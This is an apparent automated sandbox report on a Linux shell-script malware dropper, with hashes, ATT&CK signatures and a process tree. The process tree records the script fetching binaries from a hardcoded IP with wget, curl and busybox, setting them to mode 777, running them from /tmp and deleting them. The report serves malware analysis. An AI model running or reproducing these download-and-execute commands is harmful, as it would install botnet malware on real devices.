Analysis
-
max time kernel
62s -
max time network
64s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
01-11-2024 02:29
Static task
static1
Behavioral task
behavioral1
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
-
Size
10KB
-
MD5
abfaa07509a98cf9d61a9ee03366064b
-
SHA1
29b8aa70ebe761df31582b1b62505f786b247305
-
SHA256
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
-
SHA512
f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
-
SSDEEP
192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:737
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:744
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:750
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:761
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:787
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:813
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:821
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:825
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:849
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:870
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:876
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:882
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:888
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:894
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:900
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:906
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:912
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:918
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:924
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:930
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:936
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:942
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:950
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:954
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:960
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:966
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:972
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:978
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97